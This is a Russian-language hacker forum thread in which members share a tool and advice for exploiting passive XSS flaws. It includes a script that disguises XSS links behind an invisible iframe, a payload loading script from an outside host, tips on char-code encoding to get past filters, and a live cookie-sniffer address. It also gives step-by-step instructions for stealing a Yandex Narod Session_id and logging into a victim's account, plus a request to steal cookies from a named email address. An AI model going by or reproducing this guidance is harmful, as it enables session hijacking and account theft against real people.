Для новичков (пассивные Xss)
 

Дело было давно... я написал вот такой простенький скрипт.
он предназначен для тех, кому в этом разделе указали на пассивные XSS.
Если вы не знаете, что с ними делать, заходите сюда:
http://www.dron-anarchy.jino-net.ru/xss/XSS.php

Идея не нова(как просвятил меня NOFEAR)
но скрипт написан уже давно, а выложен совсемнедавно(ввиду жутких проблем с нетом)
так что пользуйте, о новички этой темы=)

Типа http://loc.netsec.ru/ ?

=))

типа да. Но где ты узрел 404 я не знаю...
Плюс ко всему я понял, что люди неисправимы... я посмотрел, чем забивают скрипт..туда пишут просто названия чатов, сайтов и т.п. типа скрипт сам должен искать уязвимости...Хоть бы инструкции читали...=(

Молоток, што скрипт закинул
гы, но ето ЛОЛ чистой воды
А для чего ты его используеш?
----------------------------------------------------------------
Претензий не имею, все ОК!

в целях проверки

лол чистой воды?))
гыгыгыы

Антошка2003 +1

Ты прав, сейчас чистой воды небивает :)

Так это типа фейк? Не понимаю как работает))

Не фейк, скорее перенаправление скриптом. Пользователь открывает ссылку, обращается к срипту, скрипт берёт из бд записанную ссылку, и уже перенаправляет браузер на исходную ссылку.

фейк чего?

Он просто генерирует непалевную ссылку для пассивной ксс.. чтобы было типа dron-anarchy.blablabla.com/43950923485029384.html а не somechat.ru/chat.php?param=<script src='http://myhost.com/a.js'></script>

О... некрофилия процветает. Опять этот топик подняли со дна)))
по такому случаю надо пойти и залить более-менее нормальную версию на скачку

обновил. Опять просмотрел все сгенерированные файлы... никто не пользуется почти по назначению. все пишут название сайта и ждут пока скрипт найдет там XSS гыгы

кстати
Нет. Не так.
Т.к. скрипт работает без баз данных(думаю, понятно по какой причине) то все делается так:
скрипт создает страницу, содержащую невидимый фрейм, в который грузится страница с вставленным XSS-кодом. Тебе дается ссылка на страницу, при заходе на которую ты видишь грустную новость о том, что что-то там не активно. Если ты совсем параноик, то смотришь в исходный код и о чудо, благодаря модификации скрипта ничего вразумительного там не находишь. Со спокойной душой закрываешь страницу и идешь спать. А куки уже улетели через фрейм на сниффер.

ну может и не в тему,но не получилось что-то снифера залить,может посмотрите ,что можно сделать?
http://www.nextworld.ru/forums/capital/index.php?sec=1"><script>alert(0)</script>

в куках лежит тока Id сессии...
если скажешь, что значит
то может и поможем)

Может ет и не по теме но я уже прочетал кучу статей по пасивных хсс но так и ничего у меня не вышло. Может кто даст мне ПОЛНЫЙ скрипт который нужно вставить в html код и об'яснит где окажутся куки после того так их он стырил. Плиз, помогите.....

заливают шеллы и заливную рыбу))

скрипт передачи куков на снифер вставляется в твоём случае так.

например мой адрес снифа
http://antichat.org/s/red.gif

кодируем
в чар код так как на том сайте экранируются кавычки и фильтруется плюсь
и вставляем так
без пробелов между цифрами
лог снифера http://antichat.org/s/red/log.php можеш им пользоваться

Mixon тебе тоже этот ответ адресуется так как в на примере показана хсс

а вообще с вопросами сюда http://forum.antichat.ru/thread46016.html

А как со снифера достать кук (сниф античатовский)???

Mixon смотриш пришедшую запись (QUERY:) дальше ищещ в пришедших куках переменную с сесией и подставляеш через оперу значение этой переменной за место своей которая у тебя на нужном сайте и ты под чужим акком

Я вижу в лог файле вижу записи а вот пришедшых куков найти немогу.
П.с. а нигде случайно нету именно по етому статейки? А то в статьях по хсс не пишут как их себе подставить. Там только как их стырить и что нужно для подмены опера или кукедит.

Вопш дело такое, у меня в снифере весит кук который мне нужен. Как мне его себе поставить? Напишыте мне в аську. Вот мой uin: 191069281. +35 WMR ЗА ПОМОЩЬ.

есть плагины для мозиллы и оперы которые меняют куки. качаешь их, ставишь и меняешь.

зы улыбнуло ((*

Значитсо так, ZYTHAR, есле все ТЫ об`ясниш по подробней то росчитаемся... Ну вот в снифе пишет такое
Запрос с mixa-mixon.narod.ru (17.03.2008 18:28)
IP: 193.109.248.245 Real IP: 192.168.12.19
QUERY: nuid=1678896011202747960
REFERER: http://mixa-mixon.narod.ru/forum.html
AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)
че мне дальше делать??? У меня опера есть....

во первых я не ZYTHAR а zythar ((*

ну что тут трудного то? погугли. в нете туевая хуча разных мануалов. там все нормально расписано
я сам оперу не юзаю. но опера есть. карочь заходим там Tools->Preferences->Advanced->Cookies->Manage Cookies. покопай в этом направлении

зы деньги оставь себе, они мне не нужны ((*

ну погугли.... а вот что в поиске то написать? даже примерно незнаю что искать. в статьях по хсс ето не описывается (я нигде не видел) так че там писать в поиске?

Как подменить куки в опере к рпимеру....

Ну на сколько я понял то снифер не полностю куки тыряет и че нужно все делать от строчки query, так оно или как?:confused:

Сниффер тырит полностью куки. Но, чтобы был смысл их подставлять, в них должен содеражться пасс и логин. Без них куки безполезны.

во первых переменная nuid не содержит ссесии
содержит сессию на народе(яндексе) переменная Session_id
а ты заманил на скрипт чела который зашол с неавторизованной страницы и поэтому его ссесия не отошла тебе на сниф.самое простое отправь ссылку с хсс скриптом жертве по почте тогда он зайдёт с авторизованной страницы своей почты

а как удастя перехватить ссесию когда увидиш в поле QUERY: перменную Session_id то в опере
зайди
Инструменты>дополнительно> cookes
выбери yandex.ru (если нет то создай или просто один раз зайди под оперой в свою мастерскую и значения появятся)
увидиш несколько переменных
выбери Session_id
нажми изменить и в поле значение поставь значение переменой Session_id которая пришла тебе на снифер
это значение выглядит примерно так
1207134369.1312.0.19549274.2:47102725:18.47843.595 4.984ec543bf13647b2d81a0fd9af0e59e
сохрани и заходи под оперой на http://narod.yandex.ru/userarea/after_register.xhtml
если всё сделал правильно то попадёш в мастерскую жертвы если на страницу авторизации то в чом то ошибся или эта ссесия уже мертва так что действуй быстрей как только жертва зайдёт на твою ссылку сразу подставляй себе его значение и действуй

Ps за 45 рублей могу видюшку сделать где показано всё в примерах))

С самими луками уже вроде все понял, теперь осталось есче две весчи, научится хорошо тырить куки, и росшыфровать пароль с них. Ну лучше начать с первого, так вот, с последнего сообщения я понял то что ето способ воровства сайтов на народе, но вот только есле жертва пользуется услугами другой почтовой системы, что идет @mail.ru или @xaker.ru то ничего же не получится, от насколько я знаю то от народа практически никто не пользуется. П.с. Есле я чтото насчет народа не правельно понял, не ругайте сильно.

Тут есче такое есть, в статьях пишут что можно кодировать-декодировать ссылки для обмана фильтров и админов, и написано что существует много прог для етого и есть сайт, но тот сайт что ими пишут почемуто не пашет, и ни одно название програмы не написано, кто знает програму для етого или норм работающий понятный сайт для етого, напишыте плиз.

Гы, случайно увидел ету тему, думаю зайду, я уже все давно понял) Ужо и сайт первыл поламал, спс всем за помошь.

сорь что не в тему но когда я создаю сниффер если я хочу имя картинки web то что мне писать в "Картинка:"?????????????????

+document.cookie

zet36 а можешь мне пожалуйста найти cookies одной почты,не получается что-то у меня,еси не сложно,вот почта,плиз очень надо !!!!

izymka_girl@mail.ru